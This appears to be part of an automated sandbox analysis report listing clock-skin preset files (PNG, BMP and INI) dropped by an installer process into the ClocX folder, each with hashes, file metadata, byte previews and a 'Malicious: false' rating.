SHA1:	1D42F855358B308F5BA790A3E7CB4EAF2161DD0E
SHA-256:	DF2A006BDC8FC9FC01ABABA6D223099540AFE6C21D5A2AECBDF7C4C07F4FF133
SHA-512:	2E62EDF1C1D44CF0037C8580E3BB219638F1E5FAC83FD95C21EE29C75E406C135A4E6E9882FC033F4E237FAC999D901C6AAA33CE55E94D70383EDDDAF56891D5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............=..2....pHYs.................gAMA....aLA.... cHRM..z0..............s;...S..<.....A.......IDATx.b...?.(........h.......h4A..a...h4A..a...h4A..a...._-+..@p..."=..8x.....}.CS......N EJ..ua...dGD..}.Z.b.]..y. .(.C.k..}?.".K..-......B.v...6...;.A@.........#C'..a......i..8.$Ib..>...r}...b...<.0....8..F.x.3...,....eYRQ.TU..iJy.S.d...i._.x. .. ..@...1.....H+....0....E.....@......................I...?..0.L.......QBB..P.{ ........II.K@..>}....../P.....@..&h,..Z........8...R...J...9~......O..<.. .....k..<.......0..&fP.F$`P....uX@l&66V...V.`./.....5tuu.........O.>=.f../_..~..3w..=.....@.......... ..g.s..SD..#d.......A..kA....s...C........>.A...b..=...p....VL)I.Q....v.:.x...\A..@.Z......F.........h..`...[.{`G.s.....d..!..~s.e..W...M.P=.@...v......@%,(.~....x.../.....h.../Hs..?.[...`.!..$.......98.Q....$...`....l...:3...g....D.O....p.%h.0....%n..>......=...;.lk_.y...P8.$....2H....h....N.j.....:A-..e...P.. ~.a\|.)A.Wv.{......{.}.m...

C:\Program Files (x86)\ClocX\Presets\NewDefault.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 119 x 120 x 24, resolution 2834 x 2834 px/m, cbSize 43256, bits offset 54
Category:	dropped
Size (bytes):	43256
Entropy (8bit):	3.318321141805908
Encrypted:	false
SSDEEP:	384:kZSPu+ghYOPL1gvlqKQJ1YTWsUtpN4GbVkAl7y07L+T9s8:cSPpgevGrC8DbCYyzZt
MD5:	816FD13D82B4DD490414E053349FA722
SHA1:	EA89DED1A0DF180277660E50ABEE02405609C830
SHA-256:	6B612912B7A557D81789C0D3EDB1FBB00B9ACD1D9F7B4BD1E689E163AA2E8182
SHA-512:	1D174F3FD8438C2FB4A59316B78962780DA217F2AAFAD2ACEF4933D5E93D6305AA2FE2E0D70BEDC6D3CCEAF248ED22F42415EBB05C8EAFED229D2337C5A3EB1C
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...w...x.....................................................................................................................................................................................\|\|\|vvvrrrnnnkkkeee`___^^_^^_^^_^^_^^_^^dcckkknnnqqquuuzzz................................................................................................................................................................................................................................................................................................}}}tttlll]\\PNMHA>>4/=0(?+ B,.G+.J+.J,.Q..]5.S1.L+.L,.N,.F-.C..@1'A5.I?;OLI][Zkkkrrrzzz........................................................................................................................................................................................................................................................................wwwlllWUTHA>=1*;).J,.[2.i;.}D".M).W,.]1.g5.h5.h6.k7.p:.l8.i7.j6.j7.d4.]0.T,.N(xE"j;.X1.J/.B2(EA9TPOj

C:\Program Files (x86)\ClocX\Presets\Nvidia.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51325
Entropy (8bit):	7.970726173309494
Encrypted:	false
SSDEEP:	1536:1UgYGQi4Wwa/oNQNl7rZm18uE9UgRt3Nx:IagNql7rZi8ueUgRt3Nx
MD5:	76A66CC455FE13CC78642306B6B0FFC5
SHA1:	EC2239DC12A29F2E779CF8E7D5C7D0D11E72F050
SHA-256:	CB30C8527BD4938FB783E767294C729DA016FE0FEA5FF77537648A7C93EA6F07
SHA-512:	7BECF5AA337146328464BEB4BB929430783D22721C2CCEC33484C8F7F6F7185C4712CFC00C56DC6779288C0B6FD7B1B3AD7298328C9875455B6FE214CC931769
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............=..2....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(........h.......h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a....f..m.Q.>..4...b'!5........ ......V..T#).4..6.B..e.}..]...7Mww..l.y..qDY.`.C.&0fB.tT....B.i...,;C..h..u.!$C4....R..N....B.....0`.Ft].$..6:O3.0&..n>......T.C.Eak...eE..x...}.4M.w.>b...~.O.uD..u]/}._.`.^.0....ft+c.......c.1q._...W......sA........y..k!yU..q......c.9...S........YD...B..4P...W.4..x..G.X,.............4P...e.n.Q.?.\.HC!....t..lA..f....s{Y..n...l.G...}...q.~3.[....iL.. `B..L".L.....de...&&!`b......e, ..f.f&`n..........A..@f!......@....o`B.......0.......F...>}.\|......0..Tw........4..h,a...4......?.A.....Q..................T.JYVV.p.....?..j!P..?....%V.Z......A%-(S00.B.........._...T.....{...?....u...o.....P....~..t/a5.(``.. .....%%30q.rrq.qqr).......!...!0.......B...(...:....._(.....1..vM.....j ..n/P..#D............l.j..,/.l..............C......

C:\Program Files (x86)\ClocX\Presets\Nvidia2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	38663
Entropy (8bit):	7.939352265060175
Encrypted:	false
SSDEEP:	768:YIygzjK57ldtn9T5V8/P6aUDIe2YpbZIflcVnhyEKUfa6:YIyl5719TQ/SEYpCchyRUfa6
MD5:	3F7A7F9AC3ACB81A6EF1566C8ABDEA93
SHA1:	63A3AA6DC8709BEE66BC947CA44246457D18A146
SHA-256:	C2A189D25B3591E3F12E2DA6D4D7D05B2C04588A15A0803FE1E66EB7BC460956
SHA-512:	912AC4B7D0EB25B9058A5D3D3360D0C5AB967D28417ED6E7651C979B1410229470CFAE2CA35F47F85DDD9791E9860902D3DD5C7287D3C45B08A43FCAF91BEDE0
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............=..2....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...}IDATx.b...?.(........h.......h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...pj-...1.,..W R."U........_h.......cG... k.....[......./C)y.....kj...-5MC...84.3.}/8.5..g.M.....;.s9..Q..0`?Q.d........\...{T.%.8_.T.h..<.........]...x..("c?.N.s.,.h.&...1.p.....1..w..a..3..8?Zk..qY..)M...H+G.8.0...+.z_....5k.....4}........f..UQ..u`-Y...u).c..w]-......t.......t.Pu.`....\|...u..S..2.^........1w}....y6R...Om..../..=...M.H......jq&..v......A.. .EM\t....h..;@ko D.P..7..P.0..8..t..MmL....&.?b......f...O.6.R.H..K{.a.:.I\.P....7.SE..s:c.Rm.f.}....7r.>..Z./..[......K.......L.... ...7^VV....?......%.../.T..i@...A%..$............./. ./B...d........4.Xr.!H.........,.8...`.%...........i~......\|.*..T..../...C..?..............-.+.a ...H...5X.e.%x....!...&..N.-.>2...m.wu?D.RN'N.,....!.k..G8b..[.....".s._...

C:\Program Files (x86)\ClocX\Presets\ORIGINAL.INI

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	947
Entropy (8bit):	4.654346901304024
Encrypted:	false
SSDEEP:	24:BE8rm5b9VTORXFBP1rfjkpWCGm8Oi5Zri:BT0AFNuMCGmIZO
MD5:	3FF821F0959312F31CD380D311B2E690
SHA1:	A0153085828FF32D7020D35330E37336191F5C69
SHA-256:	54EFA1317F80DAE7326E9FFF03D5AA7BEEFED3B1F10EB5CC2E2349EF3E362BAA
SHA-512:	CDE3BD6F5C22EE5ACE89083F9586F0DFE0371137EEE884CD7D92E600FCE652F7A80AF306A56D28E273C42619F172525C9FF17A9C9C897B2E3CA97E18A060EF39
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x000000 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x787878.;color of AM/PM indicator....HourColor=0x00595959 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=5 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=5 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x00553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=63 ;center point's X (default image_width / 2)..CenterY=62 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Octopye2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1497
Entropy (8bit):	4.856187163129489
Encrypted:	false
SSDEEP:	24:BEGrGXz5lrANhjaKhVuTOLX01rfPkp+dGm8JiX1PgibQ0Wd9iBxLuQI:B1qFlWhjfiiEdGmx1PXQJTiBxLvI
MD5:	85653ABA4507AB8F7AA3B19C5B04694B
SHA1:	EA5411F08D9E1E2242D8527E0A18A2DC9C1A5327
SHA-256:	698A1A399E48FD084FE2453458CEA1F87FE6A66CACC18BAE34C5C2AA4DFB60E0
SHA-512:	63D05A6540E7186562B9BAFCE9FA572456DD9B37EE2F8E2040F7377A35AA64EFBD95F97761D8AA39D4AE6CDC46AA73DBF222C20BDB3E8DCF3719EE276C2E3EC3
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFF0 ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x000000.;color of AM/PM indicator..AMPMFont=Arial..AMPMFontSize=12 ;size of AM/PM font..AMPMCenterY=128....DisableDate=0..DateColor=0x000000..DateFont=Arial..DateFontSize=12..DateCenterY=45....HourColor=0xFFFFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;wid

C:\Program Files (x86)\ClocX\Presets\Octopye2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24962
Entropy (8bit):	7.967086316786837
Encrypted:	false
SSDEEP:	384:PXE05mYZsf551uyWvNZ+ZM696UTYvUiRqYud3OKaLBlkBnsUA0Z6jX/wB:f35ZZk9uDvNEKdUTYvUmMiUMjYB
MD5:	E6B20AA4B1D6B2A0C678D9194D042BE9
SHA1:	106CEBA43CD660D22367D54D40F82D000FDFC706
SHA-256:	B653C83CCB4B6026BC10FCC2E110BB7C37869B95722187D576D6710810F4CA88
SHA-512:	6188A3DF83CD935F62F424793D483CF27F7F135E7BECB54F1412C6D18985A437370AB5F1FFE21B3B53B5BD9486944014155B72EAB0B9AF01709DC4C4869F2C2F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

C:\Program Files (x86)\ClocX\Presets\Omega.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	921
Entropy (8bit):	4.541130302091602
Encrypted:	false
SSDEEP:	24:BEurZuC/Tzer1SfPkLKpSLgGLTIZKgNi0uGUnn:B9kb+SkG/pAUn
MD5:	039055D6E6EC2F827F2144D2690BA58E
SHA1:	F8AEC1F29548CD3C825AEF43BFC6FFF9BE8B91E7
SHA-256:	F375DFE125D10A47F758F7DCC26A0E0B69798516E8872A0127DB465EA2F30F84
SHA-512:	1C8B3A5A6875E64DF6355203640F5D6FDC9DFC9AB91BEFFB17DAAF6B4CABEB48A23AC5A7E29883AA9F8DB0FDC42CD3EB0BEE17003A71798391ABB665BA451ECB
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=1 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0xFFFFFF ;color of hour hand.HourLength=30 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=3 ;width of hour hand..MinuteColor=0xFFFFFF ;color of minute hand.MinuteLength=48 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=2 ;width of minute hand..SecondColor=0xFFFFFF ;color of second hand.SecondLength=50 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=85 ;center point's X (default image_width / 2).CenterY=95 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Omega.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 170 x 191, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68718
Entropy (8bit):	7.985388047540227
Encrypted:	false
SSDEEP:	1536:pJAQ0eiN162qhdH6wOnlskiRG5xFQlYbQFvUbxARNq:pJR0eiNnjlnlsjRMxFQkgdNq
MD5:	90B33F49BA0866F011D67E640CCA98B0
SHA1:	35DFDA4F68CBEB266587D307343FA4BF2EA7DC96
SHA-256:	6C422277C9BC23912CA6AEF5A32F141FF1A7AD06711C52005FD8BEAE7C0655E3
SHA-512:	AA900BF4A830203857BE1F059F547BCCA69992F822405B3719987B3DD499429DCDC178B5949B2FBB979E519407304C94F03BAA5672F0C4F6016DE8E84B0ACFA0
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............nmG.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......

C:\Program Files (x86)\ClocX\Presets\Original.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18873
Entropy (8bit):	7.982586670751772
Encrypted:	false
SSDEEP:	384:f6sWIpV7vdV85P6H1LNCaP3TzMVAr/bR5fy/GPr5Kzd99qjEHwyxZ6rlgSS1Gh+n:nWyV7L2P6Vx3TzMVAr/NBy+z5Kh7wEHb
MD5:	E22608FECBA37804ABADE6A53491D5F5
SHA1:	DC6332D7E549A5D0E784125DCED56B029EF0F902
SHA-256:	8633DD0386ACB524E19DECB2546525086C13723EEACA26DAF16A91507A142C97
SHA-512:	540DCC88962AAAAC5010985FD875424E6D73ED4DD167EA039FFA8A37FFA392AA709A6E459113A52C41E9669AA06325ADC117A22FD32163FF7E36B8D21D132CCE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....gAMA....B.O.....pHYs................$tEXtSoftware.QuickTime 6.0.1 (Mac OS X).x.FA....tIME.....1.Y8.... .IDATx..Z.tTU..j_S..J*..^.......EA...8.m..G.....OO.m.g<.8m..v. ...i..@..H.$..!{.JjM-o.J%..,..g.?...{.............?m..z.7..>G..qf.&.&.m..........N....>.EZ...p.G.....8..Ql6.#...,.\FQN...._.............l.ko.;..qS.E.........H\|^"........5)~l...8.......I.D..\|.6A.......W(......TI.`.T~........B.....f..,.....a3.l...#.&....~..hwS].@k.....v..q..h$..$..1!~,...9.8...x~.........X.tZ54a....\|x.1.xF..0..`.6.h...b.iw.E..d1.6.......9...!..lr.N...8..5...A.^........U.:N..M....[.!.W%h..d.....k.t6i...R.&.....is.eq.Z.$.B..v.......hij..n.vu.j.........B.....&.q....k.;..'..!.V'(..\.... .B....EX.....".@D.-..q...'..Z.>.Y5p....i`/....oh2.....f#......!.s.H..N?o....IiQ.'i..@o/.p...kN........1.. ..Q....A./.L&.R.....O....{&... .....b..\|....1....o`.#.qt.``....l..Jm$.......H.....#h<....'.^...Q..r......01.0.....6.D....U..M.CZv,dr..;.....~Y...f

C:\Program Files (x86)\ClocX\Presets\Uhr.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	4.759908504120321
Encrypted:	false
SSDEEP:	24:BEur7X5lruueRJoR1gTzIU1sRDkLKWoL/GL4wIdKgQi0VAP10mViWd9iiOMEKG:B97JleJoEFYjGteVPGCTiiOR
MD5:	4D1C32BDBCFE4874AE33DEDBBC870574
SHA1:	A84ADDA368CE3649402EF9AFDE820CB28C549016
SHA-256:	CDA8F9357983BB8070A26E8F8E4163BE6EE41EE516F670A6F60FCD593EFB3A6A
SHA-512:	C4A26C2719803FF73F36D105FE9F25E48041813664D70C21F51515FD45CF7CB826279C39B1B1BA55BCB77E2459FA4975B8BAA65309DA86351138658B0CDD4D30
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red)....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0).AMPMColor=0x0000FF.;color of AM/PM indicator.AMPMFont=Arial.AMPMFontSize=24 ;size of AM/PM font..DisableDate=0.DateColor=0x0000FF.DateFont=Arial.DateFontSize=24..HourColor=0x000000 ;color of hour hand.HourLength=50 ;length of hour hand.HourLap=9 ;overlap of hour hand.HourWidth=5 ;width of hour hand..MinuteColor=0x000000 ;color of minute hand.MinuteLength=70 ;length of minute hand.MinuteLap=9 ;overlap of minute hand.MinuteWidth=4 ;width of minute hand..SecondColor=0x000000 ;color of second hand.SecondLength=0 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=0 ;width of second hand.. ;CenterX=60 ;center point's X

C:\Program Files (x86)\ClocX\Presets\Uhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 200, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2371
Entropy (8bit):	7.867510860779406
Encrypted:	false
SSDEEP:	48:u3LCLjFmREUcOLr9MoQw5QGojHtHLCZdp37ri1luua27zP8V75m9qz:ufjL5MoQfGkNH2Zdp3i1lujGg
MD5:	3D8E36965E80F589E391048B6E451828
SHA1:	24ADCDAAB515189F8B7E354A414FC9A96458E609
SHA-256:	28E430D0655EC2F1372272AB4DE2A7BCE4D3D068A6C4ED3C1D4FA38C7C5EB9F2
SHA-512:	DCDD3F5F5813C0BFDC7EA1356E68CFA6490D4D57B4D8D58B8B49DA00267ADE78C8CEB4A588E79CFEEA510D5C4E4411631CBD6AD6AED9A3D06AED0EF2E6517D0B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............^....tEXtCreation Time.Di 9 Mrz 2004 11:03:25 +0100L.);....tIME....../........pHYs..........iTS....gAMA......a.....PLTE..................................................................................................................................................................................................tRNS.@..f....IDATx..V.8...%E!.....P(!....-....C-I.G.d.3c....$..u.-V...MG.....Z.S{s.g.\|......O.6.Z_A.!..)...~Q..... ..ej...Q.....Q..i...w.Q.8.....[..".8. 5J.. ...52... ....`.x.G...8 B./\|\|9/j.. ZN...W...Y.J.1G....,.....h Bt.....M..f..j..X>V....f2_N.u...hT-.7p@..(......k.....Z....`%..^..x..!.2.D.q.<...U....O.9..[T.R.us.P....2.El..4W....wL.f{A..HnU..8.].......H.U..8.A..!..I....#5..eG......x...K..b.xS8.&...z..8Gx.5.m...*..XN3...q\.\...QF.,.r.u...]$e@.#W.L...=G.A...$.....)ZY..?Vh......U../.!......L)@....]_.>............r'~..Rz.(..%..G<...>].9...b..p!....9^aF. ..........\8...#..V..d.&.$.D...c...b..bF..9/.

C:\Program Files (x86)\ClocX\Presets\UniversalAccess.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	28087
Entropy (8bit):	7.896392022586553
Encrypted:	false
SSDEEP:	768:OEJ3pClk2uBpQvaJU13kpxmAKL53BT//5UfMOYAIy:OEJ3ckjBpzmAmJD4Nb
MD5:	506F6336897626BD9835E476684E6ADD
SHA1:	3C61FE92E21ACA5079397899D3F28E8658EE92C5
SHA-256:	099E2D25A3BCBBA998B4CED1D927C975267F129BCA18865C41DBBC111428B6A7
SHA-512:	D1C33B485D2809A754F7D90B8C6C123D68300F590CE526DDA5E53062B076D9EC1FC718924B66E81E810D8ABCA4B596513665068B916CEC4487B0318386D0FA29
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..m-IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8..@z..4....Mj.......W.i..........Z.}.q....x.BH...dv!....w..g.....\F3...a...V...d.R/BXQ..J[...Z..0..!.$...+....n..2.2.....4v..c...e.U0..z..J.79..........O..u..{....Q..."]....J...i..fdU[..........b_...x,.3......cn...\......~.>....Q... ..h!......~.....M!....8..?.Xr.]3;......tL.Uj]...G..mU.:.. ..Y. C["...BU...$........!(d.G</...0Odfy.b#..)........x.X...R......n,l,:.l."L,,...............E<...R.......&.R....M.@.,b.9..H+...._.]..s...>..7.9y.P.a..g@]....P.L...2..........l.......b..........,f......:.G0.R....H..........J F0....D/...)...........g.L.........u`....P.....@=w ......4....h...L.L..I...N...L.,..l.....(........"....I...Q...rH...5.(U0..K..`...(.....7+.........~..y....K..@K..S. .t.. .A....".....Y8..Y....9X....nX11".VFp+.................?Fx.......Wa.......>....2".....m...6...U..;.A......n...O.`bp..

C:\Program Files (x86)\ClocX\Presets\UniversalAccessClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 117 x 119 x 24, resolution 2834 x 2834 px/m, cbSize 41944, bits offset 54
Category:	dropped
Size (bytes):	41944
Entropy (8bit):	6.884203334546955
Encrypted:	false
SSDEEP:	768:7qhT45p/v7mUzQgC3oi76ieOCycgyC20TgDsu+Xy9Ct3PaxFf6Hc:m1o/v7mSQgC3l6ieOCycgyD0TgDQWFS8
MD5:	BC84D78607167F8C38B8B4CF7C33A54A
SHA1:	11D9589ACCBD208A0385EBA8104B4045727A7B1A
SHA-256:	29B49A701AC81741ABF8E42F569AC57FF587E91C55D4E361E97D49EE3E5AFA43
SHA-512:	10320B32859CF9FE3129C9C7C72066F877835A3952E2ED18F30B4766193DE4AE0F1347884CDA598220198EEB6BFF11592BCAABFCCF5F97989A5A48805C1D0C53
Malicious:	false
Reputation:	unknown
Preview:	BM.......6...(...u...w................................................................................................................................................................~~~{{{wwwtttttttttsssrrrsssrrrqqqqqqqqqqqqpppppppppqqqqqqqqqrrrrrrsssrrrttttttttttttwww{{{~~~.......................................................................................................................................................................................................................................................}}}yyytttpppqqqqqqppppppppplllhgghcciaah]]gXXgTSeNMeKJeEEeDDeEEfKJeMLfRQiYYi]]i``jddiggkkkooopppqqqqqqqqqqqqtttyyy}}}..........................................................................................................................................................................................................................................................~~~yttthgmSRlB@n86q/+v)$y$.~................................{#.x($s/+n52m@=lNLsdcysr}{{.......................

C:\Program Files (x86)\ClocX\Presets\Unreal.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 150, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	47143
Entropy (8bit):	7.975093314101227
Encrypted:	false
SSDEEP:	768:iEIQli4ubch7Y6jAj+lFOf68cc3NWQReu8jmJaa4/ImyJi7RGF9kepuOOdY74G:mX4Ge7JE7f6/ONWQp8jmJa9/IfJmEclw
MD5:	D483FFB9842A8F0A99F70376253FD45F
SHA1:	351350ABC3974B4ED94CB8ADC11EF057BE9F71D1
SHA-256:	6CEE1DFDA69C5D1D301919AFE55B02954DBA639AE118EBC446E32F41359BA005
SHA-512:	0777E6817E8E1AE1A68098E6F32550227A815739CB44970F64A6976ADB583E1FD30720D5F14D53DFF6C607347C4B72CDE8604F934B887AC0891D3FD6624354E3
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.....................pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(....;.. .. ....7...\..D...W.{4.Y.W^`..Wp.../..=.t...9.n..(..W...V........A..D.j..u....`.b..1/.N!M..@_.y.L....e..o.]z.v...9........Z.....)F..=.#.Zvq.*zl.>n.>...q........'w.)..5/.j....z..)....<CUP.c.B..3W......H)v.{nF.F.....~5.9.).-..^..%.z;.R...'\|.....q..w..!.....7v.... ?..e....`...2@......._.?....??t........o.>}..././FF.P.... ..._0..8A...0s.....I...../.;.......Zp..~.#H.....P.-.....Bq.`.bfb....d`1.....``.....o^FP.......b`.f..}F..P..,.Y.X!...A5.....aP)...i........`....&.xf..o.,,...........%..O......u.@..f..3.8cH.."?........_..............k.P..e..feeg...f..{...j.&`...Rc0...d.6.......&...y@6.....o.Z`..........O..."..Y.~.0f..XWX..@k..@.i4.(..../...a...uPI.2K..f]...st.L.........1...a..w...N...}FT.7...qE...............Pd...$.d.p\N...P...I..l..\ .......X.......GY..I+N..e.W.:..........@.[.o...c-7..0...~..#gV`..`56`..`......ixn%....)

C:\Program Files (x86)\ClocX\Presets\Verde.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24372
Entropy (8bit):	7.8992689181996605
Encrypted:	false
SSDEEP:	384:wKtpFYgTIAbgpMWf7/uBGdxNE8OWzMQs8gwYG0F8LsI2u4QV14dAlsoRp4OhX9VX:7n3z2jYw4WzPs8gX7COFOl3
MD5:	6695A6E6D1A860BEF4E6B14DD3A40B22
SHA1:	184D69E9C87FB39AB70A03E7834A416465F7C46D
SHA-256:	F4FAD2F41ABB996D7F8F149082EE0AC56E9960748FBB587E50A93432504790B0
SHA-512:	6F5717A39741A7C36AAFFA6996C1C795EA120E0E1C8B0612EE61B929AC00710DD4C6D33869BCF86568E26AAAF94742FE867A7EB334EED8A07E0712375284638C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..^.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4.H.......@,... ....X..E.X.......9.....7....@......k ~.....3<....>........&......z`..V..H..L. ..b. V...w...._..+..}.../...v..@...5.j.....i..@l..#.P......=......w...........O.LQ...j..v@l.....#.]..... >.....e.O..............p.bg ..L...^F....+...{.x7.........%...a .^.j.,._q......;.\.X..(8.0.....d.b.j..&q..z......W`.....q,B..Zc.V....B.FP.D..3.....O..j..+...SZdE..}.f4..F..q.)ta...v.G...g.D$$r2.....O..D.j....?.3.I.HB.D.... '".(&. ',.dK0(.H..-.0.2C.)....#.%2(....$....J.....g...../.......$f...3AC..P....?......a....W.H..q.0a:.'Z....L}.LL.RSFH.ACZ.ACR.ACJ..`9.9..@...i.d.L..u.(A......g.7........ex..9.......w......H.......f8.3@.....L..1.H ....g..hAM.P.. ./../....L."\|.(...F...B<\|....B......B...)..

C:\Program Files (x86)\ClocX\Presets\Violeta.png

Download File

